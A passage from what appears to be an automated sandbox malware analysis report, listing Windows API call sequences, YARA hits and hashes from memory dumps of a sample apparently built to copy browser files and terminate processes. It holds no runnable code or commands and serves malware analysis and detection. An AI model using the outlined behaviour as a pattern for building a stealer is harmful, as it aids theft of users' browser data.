                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                      • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                      • Opcode Fuzzy Hash: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                      • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 00928DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00911660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00928DED
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091DA68
                                      • lstrlen.KERNEL32(00000000), ref: 0091DC06
                                      • lstrlen.KERNEL32(00000000), ref: 0091DC1A
                                      • DeleteFileA.KERNEL32(00000000), ref: 0091DC99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction ID: c6fbe4eb8f989d5ecc3c98a30bacf479ab9d309c07be0c289fe258d804b385ba
                                      • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction Fuzzy Hash: D481F277910128DBCF08FBA4ED56EEE7339AF94700F504569F14662095EF346A48CF62
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                      • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                      • Opcode Fuzzy Hash: 6f72e535e7ae17eb60bcd9d89638ab31fc633a2b1ef8f0b3f434f04c74d69d2e
                                      • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                      • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                      • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                      • Opcode Fuzzy Hash: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                      • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                      APIs
                                      • memset.MSVCRT ref: 00929752
                                        • Part of subcall function 00928FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00929785,00000000), ref: 00928FC2
                                        • Part of subcall function 00928FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00928FC9
                                        • Part of subcall function 00928FB7: wsprintfW.USER32 ref: 00928FDF
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00929812
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00929830
                                      • CloseHandle.KERNEL32(00000000), ref: 0092983D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction ID: 7167a4ad83d24cb9cd9a75fd3e6b87ccbf8858a1e42956519e92286728f754d6
                                      • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction Fuzzy Hash: D3313875E00258EFDB14DFE0DC49BEDB7B9EF49700F104459E506AA188DB78AA88CF52
                                      APIs
                                      • memset.MSVCRT ref: 004194EB
                                        • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                        • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                        • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                      • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 396451647-0
                                      • Opcode ID: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                      • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                      • Opcode Fuzzy Hash: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                      • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00928931
                                      • Process32First.KERNEL32(?,00000128), ref: 00928945
                                      • Process32Next.KERNEL32(?,00000128), ref: 0092895A
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • CloseHandle.KERNEL32(?), ref: 009289C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction ID: 984ba090ec6859da9737257be0bfd36aa3f56e84dca7453744248f8f10ff0f21
                                      • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction Fuzzy Hash: C8316D72901228EBCB24DF91ED45FEEB779EF85700F104199F10AA21A4DB346E84CF92
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                      • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • CloseHandle.KERNEL32(?), ref: 00418761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                      • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                      • Opcode Fuzzy Hash: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                      • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                      • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                      • lstrcatA.KERNEL32(?,009A9810), ref: 00414FAB
                                      • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                      • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                      • Opcode Fuzzy Hash: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                      • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                      • wsprintfA.USER32 ref: 00418850
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 2716131235-2206825331
                                      • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                      • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID:
                                      • API String ID: 3407564107-0
                                      • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction ID: 3e08805e11c127fb198f801115714b497c84fb712a2fc303554ea241bd0802a1
                                      • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction Fuzzy Hash: 4F1146B5901219EFCB04DFE4E948AEDBBB9FF54305F108469E80666290E7306B14CF56
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00927C17
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00927C1E
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00927C2B
                                      • wsprintfA.USER32 ref: 00927C5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 9f060103a1ac89041e83b4560699bac3844dba7af7a76a5d7f58d9390a82eaa0
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: B01139B2944118ABCB14DFD9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                      • wsprintfA.USER32 ref: 004179F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 1243822799-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00927CCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00927CD1
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00927CE4
                                      • wsprintfA.USER32 ref: 00927D1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 4b52c3e2b542867e952bd5cdb20e2a807effd365b366309fde724975a9a8df2a
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 9E115EB1A45228EFEB208B94DC49FA9B7B8FB05721F10479AE51AA32C0C77859448F51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction ID: 193dd3c2df439d5c20da5fcdc1734a97190c81bfbd1040c5f51ed05c379ca7eb
                                      • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction Fuzzy Hash: 7B1118B4E00219EFDB18CFE6E948BEEB7B9FB04705F10C029E025AA254D7B89601CF55
                                      APIs
                                      • CreateFileA.KERNEL32(00923D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00923D55,?), ref: 00929563
                                      • GetFileSizeEx.KERNEL32(000000FF,00923D55), ref: 00929580
                                      • CloseHandle.KERNEL32(000000FF), ref: 0092958E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 7a92a98d2f3cbc3c91ca5abc0dd16cd60ff957408bb52e280c12a5fb6a508b83
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 0BF04F39F40208BBDB20DFF4EC49F9E77BAEB49710F10C654FA11A7284D63596018B40
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00926D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 00926D60
                                      • Sleep.KERNEL32(00001770), ref: 00926D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00926D81
                                      • ExitProcess.KERNEL32 ref: 00926D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
